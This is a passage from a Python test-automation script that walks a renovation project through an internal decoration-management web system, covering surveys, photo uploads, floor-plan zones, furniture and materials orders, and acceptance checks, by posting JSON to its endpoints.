'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/changeProgress/acceptOrder'\n data = {\n 'project_id': self.project_id,\n }\n result = myRequest(url, data)\n if result:\n consoleLog(u'接单完成')\n return\n\n def survey(self, is_need_waterproofing='Y'):\n \"\"\"量房\"\"\"\n\n def score():\n \"\"\"测量\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/survey/score'\n data = {\n 'grade': '20',\n 'project_id': self.project_id,\n 'reform_way_fact': 'REFORM',\n 'score_remark': '',\n 'attachments': [{\n 'attach_type': 'TOILET',\n 'imgs': [{\n \"url\": None,\n \"img_id\": None,\n 'create_name': '',\n 'create_dept': '',\n 'create_time': '',\n 'sort': 0,\n 'type': 'TOILET'\n }]\n }, {\n 'attach_type': 'KITCHEN',\n 'imgs': [{\n \"url\": None,\n \"img_id\": None,\n 'create_name': '',\n 'create_dept': '',\n 'create_time': '',\n 'sort': 1,\n 'type': 'KITCHEN'\n }]\n }, {\n 'attach_type': 'LIVING_ROOM',\n 'imgs': [{\n 'url': None,\n 'img_id': None,\n 'create_name': '',\n 'create_dept': '',\n 'create_time': '',\n 'sort': 2,\n 'type': 'LIVING_ROOM'\n }]\n }, {\n 'attach_type': 'ROOM',\n 'imgs': [{\n \"url\": None,\n \"img_id\": None,\n 'create_name': '',\n 'create_dept': '',\n 'create_time': '',\n 'sort': 3,\n 'type': 'ROOM'\n }]\n }, {\n 'attach_type': 'OTHER',\n 'imgs': [{\n \"url\": None,\n \"img_id\": None,\n 'create_name': '',\n 'create_dept': '',\n 'create_time': '',\n 'sort': 4,\n 'type': 'OTHER'\n }]\n }]\n }\n for attachment in data['attachments']:\n IMG = upLoadPhoto(url=self.uploadPhotoURL, filename='%s.png' % attachment['attach_type'])\n attachment['imgs'][0]['url'] = IMG.url\n attachment['imgs'][0]['img_id'] = IMG.id\n result = myRequest(url, data)\n if result:\n # consoleLog(u'测量完成')\n return\n\n def profee():\n \"\"\"物业交割\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/survey/profee'\n IMG = upLoadPhoto(url=self.uploadPhotoURL, filename='PROPERTY_DELIVERY_ORDER.png')\n data = {\n 'air_switch': '',\n 'door_card': '',\n 'door_key': '',\n 'electricity_card': '',\n 'electricity_meter_num': '',\n 'electricity_meter_remain': '',\n 'gas_card': '',\n 'gas_meter_num': '',\n 'gas_meter_remain': '',\n 'project_id': str(self.project_id),\n 'water_card': '',\n 'water_card_remain': '',\n 'water_meter_num': '',\n 'attachments': [{\n 'attach_type': 'PROPERTY_DELIVERY_ORDER',\n 'imgs': [{\n \"url\": IMG.url,\n \"img_id\": IMG.id,\n 'create_name': '',\n 'create_dept': '',\n 'create_time': '',\n 'sort': 0,\n 'type': ''\n }]\n }],\n 'resource': 'SURVEY'\n }\n result = myRequest(url, data)\n if result:\n # consoleLog(u'物业交割完成')\n return\n\n def closed():\n \"\"\"闭水\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/survey/closed'\n IMG = upLoadPhoto(url=self.uploadPhotoURL, filename='SCENE.png')\n data = {\n 'air_switch': None,\n 'attachments': [{\n 'attach_type': 'SCENE',\n 'imgs': [{\n \"url\": IMG.url,\n \"img_id\": IMG.id,\n 'create_name': '',\n 'create_dept': '',\n 'create_time': '',\n 'sort': 0,\n 'type': ''\n }]\n }],\n 'check_remark': None,\n 'closed_water_test_result': 'Y',\n 'is_need_waterproofing': is_need_waterproofing,\n 'curOneLevelNode': None,\n 'curTwoLevelNode': None,\n 'door_card': None,\n 'door_key': None,\n 'electricity_card': None,\n 'electricity_meter_num': None,\n 'electricity_meter_remain': None,\n 'gas_card': None,\n 'gas_meter_num': None,\n 'gas_meter_remain': None,\n 'grade': 20,\n 'landlordGoods': None,\n 'project_id': self.project_id,\n 'reform_way_fact': None,\n 'reform_way_fact_name': '',\n 'remark': '测试',\n 'score_remark': None,\n 'water_card': None,\n 'water_card_remain': None,\n 'water_meter_num': None\n }\n result = myRequest(url, data)\n if result:\n # consoleLog(u'闭水完成')\n return\n\n score()\n profee()\n closed()\n consoleLog(u'量房完成')\n\n def projectOrder(self, rooms=3, livings=1, kitchens=1, bathrooms=2, balconys=2):\n \"\"\"项目计划\"\"\"\n\n def design_zone(zone_type, room_no, usearea, have_toilet=\"WITHOUT\", have_balcony=\"WITHOUT\", is_fictitious_room='N'):\n \"\"\"分割户型\"\"\"\n if have_toilet == \"HAVE\": # 卫生间\n have_toilet_name = \"有(4平米)\"\n toilet_area = \"4\"\n else:\n have_toilet_name = \"-\"\n toilet_area = \"0\"\n if have_balcony == \"HAVE\": # 阳台\n have_balcony_name = \"有(4平米)\"\n balcony_area = \"4\"\n else:\n have_balcony_name = \"-\"\n balcony_area = \"0\"\n if zone_type == 'ROOM': # 朝向\n zone_orientation = \"SOURTH\"\n zone_orientation_name = \"南\"\n else:\n zone_orientation = \"NORTH\"\n zone_orientation_name = \"北\"\n zone = {\n \"zone_type\": zone_type,\n \"zone_type_name\": dict.DecorationZoneType.get(zone_type),\n \"room_no\": room_no,\n \"room_no_name\": dict.DecorationRoomNo.get(room_no),\n \"zone_orientation\": zone_orientation,\n \"zone_orientation_name\": zone_orientation_name,\n \"have_toilet\": have_toilet,\n \"have_toilet_name\": have_toilet_name,\n \"toilet_area\": toilet_area,\n \"have_balcony\": have_balcony,\n \"have_balcony_name\": have_balcony_name,\n \"balcony_area\": balcony_area,\n \"have_window_name\": \"有(1平米)\",\n \"window_area\": \"1\",\n \"zone_status_name\": \"已创建\",\n \"zone_status\": \"FOUND\",\n \"usearea\": usearea,\n \"window_type\": \"ORDINARYWINDOW\",\n \"zone_id\": \"\",\n \"is_fictitious_room\": is_fictitious_room\n }\n return zone\n\n zone_list = []\n for room_no in dict.DecorationRoomNo.keys():\n pass\n\n url = 'http://decorate.ishangzu.com/isz_decoration/decoHouseInfoController/saveOrUpdateApartment/saveApartment/projectOrder'\n img = upLoadPhoto(url=self.uploadPhotoURL, filename='LAYOUT.png') # 户型图上传\n data = {\n 'build_area': self.build_area,\n 'reform_way_fact': 'OLDRESTYLE',\n 'decoration_style': 'WUSHE_BREEZE',\n 'house_orientation': 'SOURTH',\n 'remould_rooms': rooms,\n 'remould_livings': livings,\n 'remould_kitchens': kitchens,\n 'remould_bathrooms': bathrooms,\n 'remould_balconys': balconys,\n 'info_id': self.info_id,\n 'module_type': 'projectOrder',\n 'handle_type': 'updateApartment',\n \"layout_attachs\": {\n \"attach_type\": \"LAYOUT\",\n \"imgs\": [{\n \"url\": img.url,\n \"img_id\": img.id,\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 0,\n \"type\": \"\"\n }]\n },\n 'zoneList': [\n {\n \"zone_type\": \"PUBLIC_TOILET\",\n \"zone_type_name\": \"公共卫生间\",\n \"room_no\": \"PUBLIC_TOILET_1\",\n \"room_no_name\": \"公共卫生间1\",\n \"zone_orientation\": \"NORTH\",\n \"zone_orientation_name\": \"北\",\n \"have_toilet\": \"WITHOUT\",\n \"have_toilet_name\": \"-\",\n \"toilet_area\": \"0\",\n \"have_balcony\": \"WITHOUT\",\n \"have_balcony_name\": \"-\",\n \"balcony_area\": \"0\",\n \"have_window_name\": \"有(1平米)\",\n \"window_area\": \"1\",\n \"zone_status_name\": \"已创建\",\n \"zone_status\": \"FOUND\",\n \"usearea\": \"4\",\n \"window_type\": \"ORDINARYWINDOW\",\n \"zone_id\": \"\",\n \"is_fictitious_room\": \"N\"\n },\n {\n \"zone_type\": \"KITCHEN\",\n \"zone_type_name\": \"厨房\",\n \"room_no\": \"KITCHEN_1\",\n \"room_no_name\": \"厨房\",\n \"zone_orientation\": \"EAST\",\n \"zone_orientation_name\": \"东\",\n \"have_toilet\": \"WITHOUT\",\n \"have_toilet_name\": \"-\",\n \"toilet_area\": \"0\",\n \"have_balcony\": \"WITHOUT\",\n \"have_balcony_name\": \"-\",\n \"balcony_area\": \"0\",\n \"have_window_name\": \"有(1平米)\",\n \"window_area\": \"1\",\n \"zone_status_name\": \"已创建\",\n \"zone_status\": \"FOUND\",\n \"usearea\": \"8\",\n \"window_type\": \"ORDINARYWINDOW\",\n \"zone_id\": \"\",\n \"is_fictitious_room\": \"N\"\n },\n {\n \"zone_type\": \"PARLOUR\",\n \"zone_type_name\": \"客厅\",\n \"room_no\": \"PARLOUR_1\",\n \"room_no_name\": \"客厅1\",\n \"zone_orientation\": \"EAST\",\n \"zone_orientation_name\": \"东\",\n \"have_toilet\": \"WITHOUT\",\n \"have_toilet_name\": \"-\",\n \"toilet_area\": \"0\",\n \"have_balcony\": \"WITHOUT\",\n \"have_balcony_name\": \"-\",\n \"balcony_area\": \"0\",\n \"have_window_name\": \"有(1平米)\",\n \"window_area\": \"1\",\n \"zone_status_name\": \"已创建\",\n \"zone_status\": \"FOUND\",\n \"usearea\": \"16\",\n \"window_type\": \"ORDINARYWINDOW\",\n \"zone_id\": \"\",\n \"is_fictitious_room\": \"N\"\n },\n {\n \"zone_type\": \"ROOM\",\n \"zone_type_name\": \"房间\",\n \"room_no\": \"METH\",\n \"room_no_name\": \"甲\",\n \"zone_orientation\": \"SOURTH\",\n \"zone_orientation_name\": \"南\",\n \"have_toilet\": \"HAVE\",\n \"have_toilet_name\": \"有(4平米)\",\n \"toilet_area\": \"4\",\n \"have_balcony\": \"WITHOUT\",\n \"have_balcony_name\": \"-\",\n \"balcony_area\": \"0\",\n \"have_window_name\": \"有(1平米)\",\n \"window_area\": \"1\",\n \"zone_status_name\": \"已创建\",\n \"zone_status\": \"FOUND\",\n \"usearea\": \"11\",\n \"window_type\": \"ORDINARYWINDOW\",\n \"zone_id\": \"\",\n \"is_fictitious_room\": \"N\"\n },\n {\n \"zone_type\": \"ROOM\",\n \"zone_type_name\": \"房间\",\n \"room_no\": \"ETH\",\n \"room_no_name\": \"乙\",\n \"zone_orientation\": \"SOURTH\",\n \"zone_orientation_name\": \"南\",\n \"have_toilet\": \"WITHOUT\",\n \"have_toilet_name\": \"-\",\n \"toilet_area\": \"0\",\n \"have_balcony\": \"WITHOUT\",\n \"have_balcony_name\": \"-\",\n \"balcony_area\": \"0\",\n \"have_window_name\": \"有(1平米)\",\n \"window_area\": \"1\",\n \"zone_status_name\": \"已创建\",\n \"zone_status\": \"FOUND\",\n \"usearea\": \"12\",\n \"window_type\": \"ORDINARYWINDOW\",\n \"zone_id\": \"\",\n \"is_fictitious_room\": \"N\"\n },\n {\n \"zone_type\": \"ROOM\",\n \"zone_type_name\": \"房间\",\n \"room_no\": \"PROP\",\n \"room_no_name\": \"丙\",\n \"zone_orientation\": \"SOURTH\",\n \"zone_orientation_name\": \"南\",\n \"have_toilet\": \"WITHOUT\",\n \"have_toilet_name\": \"-\",\n \"toilet_area\": \"0\",\n \"have_balcony\": \"WITHOUT\",\n \"have_balcony_name\": \"-\",\n \"balcony_area\": \"0\",\n \"have_window_name\": \"有(1平米)\",\n \"window_area\": \"1\",\n \"zone_status_name\": \"已创建\",\n \"zone_status\": \"FOUND\",\n \"usearea\": \"13\",\n \"window_type\": \"ORDINARYWINDOW\",\n \"zone_id\": \"\",\n \"is_fictitious_room\": \"N\"\n },\n {\n \"zone_type\": \"BALCONY\",\n \"zone_type_name\": \"阳台\",\n \"room_no\": \"BALCONY_1\",\n \"room_no_name\": \"阳台1\",\n \"zone_orientation\": \"SOURTH\",\n \"zone_orientation_name\": \"南\",\n \"have_toilet\": \"WITHOUT\",\n \"have_toilet_name\": \"-\",\n \"toilet_area\": \"0\",\n \"have_balcony\": \"WITHOUT\",\n \"have_balcony_name\": \"-\",\n \"balcony_area\": \"0\",\n \"have_window_name\": \"有(0平米)\",\n \"window_area\": \"0\",\n \"zone_status_name\": \"已创建\",\n \"zone_status\": \"FOUND\",\n \"usearea\": \"2\",\n \"window_type\": \"ORDINARYWINDOW\",\n \"zone_id\": \"\",\n \"is_fictitious_room\": \"N\"\n },\n {\n \"zone_type\": \"BALCONY\",\n \"zone_type_name\": \"阳台\",\n \"room_no\": \"BALCONY_2\",\n \"room_no_name\": \"阳台2\",\n \"zone_orientation\": \"SOURTH\",\n \"zone_orientation_name\": \"南\",\n \"have_toilet\": \"WITHOUT\",\n \"have_toilet_name\": \"-\",\n \"toilet_area\": \"0\",\n \"have_balcony\": \"WITHOUT\",\n \"have_balcony_name\": \"-\",\n \"balcony_area\": \"0\",\n \"have_window_name\": \"有(1平米)\",\n \"window_area\": \"1\",\n \"zone_status_name\": \"已创建\",\n \"zone_status\": \"FOUND\",\n \"usearea\": \"3\",\n \"window_type\": \"ORDINARYWINDOW\",\n \"zone_id\": \"\",\n \"is_fictitious_room\": \"N\"\n }\n ],\n 'project_id': self.project_id,\n 'project_no': self.project_no,\n 'entrust_type': self.entrust_type\n }\n result = myRequest(url, data)\n if result:\n consoleLog(u'项目方案制定完成')\n return\n\n def configList(self):\n \"\"\"物品清单\"\"\"\n\n def designConfigList():\n \"\"\"制定物品清单\"\"\"\n\n def getZoneId():\n \"\"\"获取甲房间的zone_id\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewConfigurationController/queryZone/%s' % self.project_id\n result = myRequest(url, method='get')\n if result:\n zoneInfo = result['obj']\n for i in zoneInfo:\n if i['function_zone'] == u'甲':\n zoneId = i['zone_id']\n return zoneId\n\n def confirm():\n \"\"\"制定订单\"\"\"\n zoneId = getZoneId()\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationConfigController/confirm'\n data = [\n {\n \"acceptance_num\": None,\n \"acceptance_num_this\": None,\n \"brand_id\": None,\n \"brand_name\": \"爱上租定制\",\n \"category_flag\": None,\n \"category_one_id\": None,\n \"category_one_len\": None,\n \"category_one_nm\": \"家具\",\n \"category_two_id\": None,\n \"category_two_nm\": \"书桌\",\n \"config_list_id\": None,\n \"config_list_status\": None,\n \"config_list_status_name\": None,\n \"create_name\": None,\n \"create_time\": None,\n \"create_uid\": None,\n \"deleted\": None,\n \"flag\": None,\n \"function_zone\": \"甲\",\n \"function_zone_len\": None,\n \"new_replenish_id\": None,\n \"order_type\": None,\n \"predict_delivery_date\": None,\n \"project_id\": self.project_id,\n \"purchase_num\": \"10\",\n \"purchase_order_no\": None,\n \"real_delivery_time\": None,\n \"remark\": None,\n \"remark_accept\": None,\n \"remark_return\": None,\n \"replacement_order\": None,\n \"return_num\": None,\n \"return_num_this\": None,\n \"standard_id\": None,\n \"standard_name\": \"0.86M(3.0)\",\n \"submit_time\": None,\n \"supplier_id\": \"8A2152435CF3FFF3015D0C64330F0011\",\n \"supplier_name\": \"浙江品至家具有限公司\",\n \"total_account\": None,\n \"total_paid\": 3100,\n \"unit_id\": None,\n \"unit_name\": \"张\",\n \"unit_price\": 310,\n \"update_time\": None,\n \"update_uid\": None,\n \"zone_id\": zoneId,\n \"index\": 0,\n \"disabled\": \"true\"\n }\n ]\n result = myRequest(url, data)\n if result:\n consoleLog(u'物品添加完成,准备下单')\n return\n\n def submitOrder():\n \"\"\"下单\"\"\"\n confirm()\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationConfigController/submitOrder'\n data = [{\n \"predict_delivery_date\": '%s 00:00:00' % addDays(2),\n \"project_id\": self.project_id,\n \"supplier_id\": \"8A2152435CF3FFF3015D0C64330F0011\",\n \"supplier_name\": \"家具供应商:浙江品至家具有限公司\"\n }]\n result = myRequest(url, data)\n if result:\n consoleLog(u'物品清单下单完成')\n return\n\n submitOrder()\n\n def acceptanceConfigList():\n \"\"\"物品清单验收\"\"\"\n\n def getSupplierOrderDetail(supplierId):\n \"\"\"获取物品清单信息\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationConfigController/supplierOrdersDetail'\n data = {\"project_id\": self.project_id, \"supplier_id\": supplierId}\n result = myRequest(url, data)\n if result:\n return result['obj']\n\n def acceptanceConfirm():\n \"\"\"验收确认\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationConfigController/acceptance/confirm'\n supplierIds = self.config_suppliers\n configsVo = []\n for supplierId in supplierIds:\n configs = getSupplierOrderDetail(supplierId)\n for config in configs:\n configsVo.append(config)\n for i in configsVo:\n i['real_delivery_time'] = time.strftime('%Y-%m-%d %H:%M:%S')\n result = myRequest(url, configsVo)\n if result:\n consoleLog(u'物品清单验收完成!')\n return\n\n acceptanceConfirm()\n\n designConfigList()\n acceptanceConfigList()\n\n def stuffList(self):\n \"\"\"装修清单\"\"\"\n\n commonData = [\n {\n \"acceptance_num\": None,\n \"acceptance_num_this\": 0,\n \"acceptance_time\": None,\n \"create_time\": time.strftime('%Y-%m-%d %H:%M:%S'),\n \"create_uid\": self.user.user_id,\n \"data_type\": \"成品安装\",\n \"data_type_len\": 26,\n \"decoration_detial\": \"家具安装\",\n \"deleted\": 0,\n \"function_zone\": \"甲\",\n \"function_zone_len\": 100,\n \"hard_deliver_audit_status\": None,\n \"order_type\": None,\n \"predict_delivery_date\": None,\n \"project_id\": self.project_id,\n \"purchase_num\": \"10\",\n \"purchase_order_no\": None,\n \"remark\": None,\n \"remark_accept\": None,\n \"remark_detail\": \"\",\n \"remark_return\": None,\n \"replacement_order\": None,\n \"return_name\": None,\n \"return_num\": None,\n \"return_num_this\": 0,\n \"stuff_fees_change_reason\": None,\n \"stuff_list_id\": None,\n \"stuff_list_status\": \"DRAFT\",\n \"submit_time\": None,\n \"supplier_id\": None,\n \"supplier_name\": None,\n \"total_account\": None,\n \"total_paid\": \"100.00\",\n \"unit_id\": None,\n \"unit_name\": \"件\",\n \"unit_price\": 10,\n \"update_time\": time.strftime('%Y-%m-%d %H:%M:%S'),\n \"update_uid\": self.user.user_id,\n \"zone_type\": None,\n \"type_index\": 0,\n \"fun_index\": 0\n }, {\n \"acceptance_num\": None,\n \"acceptance_num_this\": 0,\n \"acceptance_time\": None,\n \"create_time\": time.strftime('%Y-%m-%d %H:%M:%S'),\n \"create_uid\": self.user.user_id,\n \"data_type\": \"成品安装\",\n \"data_type_len\": 26,\n \"decoration_detial\": \"嵌入式天花灯-改造\",\n \"deleted\": 0,\n \"function_zone\": \"甲\",\n \"function_zone_len\": 100,\n \"hard_deliver_audit_status\": None,\n \"order_type\": None,\n \"predict_delivery_date\": None,\n \"project_id\": self.project_id,\n \"purchase_num\": \"11\",\n \"purchase_order_no\": None,\n \"remark\": None,\n \"remark_accept\": None,\n \"remark_detail\": \"\",\n \"remark_return\": None,\n \"replacement_order\": None,\n \"return_name\": None,\n \"return_num\": None,\n \"return_num_this\": 0,\n \"stuff_fees_change_reason\": None,\n \"stuff_list_id\": None,\n \"stuff_list_status\": \"DRAFT\",\n \"submit_time\": None,\n \"supplier_id\": None,\n \"supplier_name\": None,\n \"total_account\": None,\n \"total_paid\": \"264.00\",\n \"unit_id\": None,\n \"unit_name\": \"个\",\n \"unit_price\": 24,\n \"update_time\": time.strftime('%Y-%m-%d %H:%M:%S'),\n \"update_uid\": self.user.user_id,\n \"zone_type\": None,\n \"fun_index\": 1,\n \"type_index\": 1\n }, {\n \"acceptance_num\": None,\n \"acceptance_num_this\": 0,\n \"acceptance_time\": None,\n \"create_time\": time.strftime('%Y-%m-%d %H:%M:%S'),\n \"create_uid\": self.user.user_id,\n \"data_type\": \"成品安装\",\n \"data_type_len\": 26,\n \"decoration_detial\": \"明装筒灯-改造\",\n \"deleted\": 0,\n \"function_zone\": \"甲\",\n \"function_zone_len\": 100,\n \"hard_deliver_audit_status\": None,\n \"order_type\": None,\n \"predict_delivery_date\": None,\n \"project_id\": self.project_id,\n \"purchase_num\": \"12\",\n \"purchase_order_no\": None,\n \"remark\": None,\n \"remark_accept\": None,\n \"remark_detail\": \"\",\n \"remark_return\": None,\n \"replacement_order\": None,\n \"return_name\": None,\n \"return_num\": None,\n \"return_num_this\": 0,\n \"stuff_fees_change_reason\": None,\n \"stuff_list_id\": None,\n \"stuff_list_status\": \"DRAFT\",\n \"submit_time\": None,\n \"supplier_id\": None,\n \"supplier_name\": None,\n \"total_account\": None,\n \"total_paid\": \"403.20\",\n \"unit_id\": None,\n \"unit_name\": \"个\",\n \"unit_price\": 33.6,\n \"update_time\": time.strftime('%Y-%m-%d %H:%M:%S'),\n \"update_uid\": self.user.user_id,\n \"zone_type\": None,\n \"fun_index\": 1,\n \"type_index\": 1\n }\n ]\n\n def designStuffList():\n \"\"\"制定装修清单\"\"\"\n\n def preview():\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationStuffController/preview'\n data = commonData\n result = myRequest(url, data)\n if result:\n return\n\n def saveStuffLists():\n preview()\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationStuffController/saveStuffLists'\n projectInfo = sqlbase.serach(\n \"select b.address,a.config_order_no,b.contract_id,b.contract_num,b.create_time,b.entrust_end_date,b.entrust_start_date,b.house_code,b.housekeep_mange_uid,b.info_id,\"\n \"a.project_no,b.sign_date,b.city_code,b.city_name from %s.decoration_house_info b inner join %s.new_decoration_project a on a.info_id=b.info_id and a.project_id='%s'\" % (\n get_conf('db', 'decoration_db'), get_conf('db', 'decoration_db'), self.project_id))\n construct_person = UserInfo(self.construct_uid)\n data = {\n \"newStuffList\": commonData,\n \"project\": {\n \"address\": self.address,\n \"build_area\": self.build_area,\n \"cable_laying_type\": \"INNERPIPEINNERLINE\",\n \"cable_laying_type_name\": None,\n \"city_code\": self.city_code,\n \"city_name\": self.city_name,\n \"closed_water_test_result\": self.closed_water_test_result,\n \"complete_two_nodes\": self.complete_two_nodes,\n \"complete_two_nodes_list\": self.complete_two_nodes,\n \"config_list_status\": self.config_list_status,\n \"config_list_status_name\": get_dict_value(self.config_list_status),\n \"config_order_no\": self.config_order_no,\n \"config_progress\": self.config_progress,\n \"config_progress_name\": get_dict_value(self.config_progress),\n \"config_submit_time\": time.strftime('%Y-%m-%d %H:%M:%S'),\n \"config_submit_uid\": self.config_submit_uid,\n \"config_submit_uname\": self.config_submit_uname,\n \"construct_uid\": self.construct_uid,\n \"construct_uname\": self.construct_uname,\n \"construct_uname_phone\": \"%s/%s\" % (construct_person.user_name, construct_person.user_phone),\n \"contract_id\": self.contract_id,\n \"contract_num\": self.contract_num,\n \"contract_type\": self.contract_type,\n \"contract_type_name\": get_dict_value(self.contract_type),\n \"create_time\": self.create_time,\n \"create_uid\": self.create_uid,\n \"current_one_node\": self.current_one_node,\n \"decoration_style\": \"WUSHE_BREEZE\",\n \"decoration_style_name\": \"随寓和风\",\n \"deleted\": 0,\n \"deliver_room_date\": \"1970-01-02 00:00:00.0\",\n \"dispach_remark\": \"测试\",\n \"entrust_end_date\": self.entrust_end_date,\n \"entrust_start_date\": self.entrust_start_date,\n \"entrust_type_fact\": \"SHARE\",\n \"entrust_type_fact_name\": \"合租\",\n \"grade\": 20,\n \"hidden_check_date\": \"1970-01-02 00:00:00.0\",\n \"house_code\": self.house_code,\n \"housekeep_mange_name\": None,\n \"housekeep_mange_uid\": self.housekeep_mange_uid,\n \"info_id\": self.info_id,\n \"is_active\": \"Y\",\n \"is_active_name\": \"是\",\n \"one_level_nodes\": self.one_level_nodes,\n \"order_status_name\": \"进程中\",\n \"order_type_name\": \"新收配置订单\",\n \"overall_check_date\": \"1970-01-02 00:00:00.0\",\n \"phone\": \"18815286582\",\n \"place_order_date\": self.place_order_date,\n \"place_order_dep\": \"\",\n \"place_order_dep_name\": None,\n \"place_order_reason\": \"测试\",\n \"place_order_uid\": self.user.user_id,\n \"place_order_uname\": self.user.user_id,\n \"plumbing_type\": \"INNERPIPE\",\n \"plumbing_type_name\": None,\n \"predict_complete_date\": \"\",\n \"predict_days\": 0,\n \"predict_hidden_check_date\": '%s 00:00:00' % addDays(2),\n \"predict_overall_check_date\": '%s 00:00:00' % addDays(2),\n \"predict_stuff_check_date\": '%s 00:00:00' % addDays(2),\n \"predict_survey_date\": '%s 09:00:00' % addDays(2),\n \"project_id\": self.project_id,\n \"project_no\": projectInfo[10],\n \"project_order_status\": \"INPROCESS\",\n \"project_order_type\": \"NEW_COLLECT_ORDER\",\n \"reform_way\": \"OLDRESTYLE\",\n \"reform_way_fact\": \"OLDRESTYLE\",\n \"reform_way_fact_name\": \"老房全装\",\n \"reform_way_name\": \"老房全装\",\n \"remark\": \"\",\n \"room_toilet\": \"3/2\",\n \"sign_date\": projectInfo[11],\n \"sign_name\": None,\n \"sign_uid\": \"8A2152435DC1AEAA015DDE96F9276279\",\n \"sign_user_phone\": None,\n \"start_time\": '%s 00:00:00' % addDays(2),\n \"stuff_check_date\": \"1970-01-02 00:00:00.0\",\n \"stuff_list_status\": \"DRAFT\",\n \"stuff_list_status_name\": \"待下单\",\n \"stuff_order_no\": \"\",\n \"stuff_submit_time\": \"1970-01-02 00:00:00.0\",\n \"stuff_submit_uid\": \"\",\n \"stuff_submit_uname\": \"\",\n \"supplier_id\": \"8A2152435FBAEFC3015FBAEFC3000000\",\n \"supplier_name\": \"测试专用硬装供应商\",\n \"supplier_uid\": \"8AB398CA5FBAF072015FBB26338A0002\",\n \"supplier_uname\": \"测试专用硬装员工\",\n \"supplier_uname_phone\": \"测试专用硬装员工/18815286582\",\n \"timeMap\": None,\n \"total_paid\": 0,\n \"two_level_nodes\": \"[\\\"VOLUME_SCORE\\\",\\\"SURVEY_PROPERTY_DELIVERY\\\",\\\"WATER_CLOSED_TEST\\\",\\\"DECORATION_CONFIG_LIST\\\",\\\"GOODS_CONFIG_LIST\\\",\\\"PROJECT_PLAN\\\",\\\"CONCEALMENT_ACCEPTANCE\\\",\\\"HARD_ACCEPTANCE\\\",\\\"ACCEPTANCE_PROPERTY_DELIVERY\\\",\\\"COST_SETTLEMENT\\\",\\\"OVERALL_ACCEPTANCE\\\",\\\"HOUSE_DELIVERY\\\",\\\"INDOOR_PICTURE\\\"]\",\n \"update_time\": time.strftime('%Y-%m-%d %H:%M:%S'),\n \"update_uid\": \"8AEF8688600F30F30160257579287F96\",\n \"wall_condition\": \"OLDHOUSE\",\n \"wall_condition_name\": None\n }\n }\n result = myRequest(url, data)\n if result:\n consoleLog(u'装修清单制定完成')\n return\n\n self.update()\n saveStuffLists()\n\n def acceptanceStuffList():\n \"\"\"装修清单验收\"\"\"\n geturl = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationStuffController/getSuffList/%s' % self.project_id\n result = myRequest(geturl, method='get')\n if result:\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationStuffController/acceptanceAll'\n acceptance_time = time.strftime('%Y-%m-%d %H:%M:%S')\n data = result['obj']['newStuffList']\n for stufflist in data:\n stufflist['acceptance_time'] = acceptance_time\n stufflist['acceptance_num_this'] = stufflist['purchase_num']\n result = myRequest(url, data)\n if result:\n consoleLog(u'装修清单验收完成')\n return\n\n designStuffList()\n acceptanceStuffList()\n\n def hideAndStufCheck(self):\n \"\"\"施工中\"\"\"\n\n def hideCheck():\n \"\"\"隐蔽验收\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/constructing/hideCheck'\n data = {\n \"air_switch\": None,\n \"attachments\": [{\n \"attach_type\": \"TOILET\",\n \"imgs\": [{\n \"url\": get_conf('img', 'url'),\n \"img_id\": get_conf('img', 'img_id'),\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 0,\n \"type\": \"TOILET\"\n }]\n }, {\n \"attach_type\": \"KITCHEN\",\n \"imgs\": [{\n \"url\": get_conf('img', 'url'),\n \"img_id\": get_conf('img', 'img_id'),\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 1,\n \"type\": \"KITCHEN\"\n }]\n }, {\n \"attach_type\": \"LIVING_ROOM\",\n \"imgs\": [{\n \"url\": get_conf('img', 'url'),\n \"img_id\": get_conf('img', 'img_id'),\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 2,\n \"type\": \"LIVING_ROOM\"\n }]\n }, {\n \"attach_type\": \"BALCONY\",\n \"imgs\": [{\n \"url\": get_conf('img', 'url'),\n \"img_id\": get_conf('img', 'img_id'),\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 3,\n \"type\": \"BALCONY\"\n }]\n }, {\n \"attach_type\": \"OTHER\",\n \"imgs\": [{\n \"url\": get_conf('img', 'url'),\n \"img_id\": get_conf('img', 'img_id'),\n \"create_name\": \"\",\n \"create_dept\": \"\",\n \"create_time\": \"\",\n \"sort\": 4,\n \"type\": \"OTHER\"\n }]\n }],\n \"check_remark\": \"\",\n \"closed_water_test_result\": None,\n \"curOneLevelNode\": None,\n \"curTwoLevelNode\": None,\n \"door_card\": None,\n \"door_key\": None,\n \"electricity_card\": None,\n \"electricity_meter_num\": None,\n \"electricity_meter_remain\": None,\n \"gas_card\": None,\n \"gas_meter_num\": None,\n \"gas_meter_remain\": None,\n \"grade\": None,\n \"hidden_check_date\": '%s 09:00:00' % addDays(1),\n \"landlordGoods\": None,\n \"project_id\": self.project_id,\n \"reform_way_fact\": None,\n \"reform_way_fact_name\": \"\",\n \"remark\": None,\n \"score_remark\": None,\n \"water_card\": None,\n \"water_card_remain\": None,\n \"water_meter_num\": None\n }\n for attachment in data['attachments']:\n IMG = upLoadPhoto(url=self.uploadPhotoURL, filename='%s.png' % attachment['attach_type'])\n attachment['imgs'][0]['url'] = IMG.url\n attachment['imgs'][0]['img_id'] = IMG.id\n result = myRequest(url, data)\n if result:\n consoleLog(u'隐蔽验收完成')\n return\n\n def stufCheck():\n \"\"\"硬装验收\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/constructing/stufCheck'\n data = {\n \"air_switch\": None,\n \"attachments\": [{\n \"attach_type\": 